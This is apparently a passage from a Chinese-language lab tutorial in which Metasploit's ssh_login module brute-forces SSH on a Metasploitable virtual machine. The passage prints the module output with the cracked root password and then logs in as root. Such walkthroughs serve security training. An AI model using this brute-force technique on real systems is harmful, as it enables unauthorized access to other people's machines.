在终端中输入“run”, 开始向目标主机爆破ssh的登陆帐号和密码,登陆帐号为root,密码为gzt041057。
msf6 auxiliary(scanner/ssh/ssh_login) > run
[+] 192.168.22.134:22 - Success: 'root:gzt041057' 'uid=0(root) gid=0(root) groups=0(root) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 3 opened (192.168.22.137:45913 -> 192.168.22.134:22) at 2021-02-06 13:52:04 +0800
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
在终端中输入“ssh root@192.168.22.134”,连接目标主机。
msf6 auxiliary(scanner/ssh/ssh_login) > ssh root@192.168.22.134
[*] exec: ssh root@192.168.22.134
The authenticity of host '192.168.22.134 (192.168.22.134)' can't be established.
RSA key fingerprint is SHA256:BQHm5EoHX9GCiOLuVscegPXLQOsuPs+E9d/rrJB84rk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.22.134' (RSA) to the list of known hosts.
root@192.168.22.134's password:
Last login: Fri Feb 5 23:51:57 2021 from :0.0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~#
3341
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
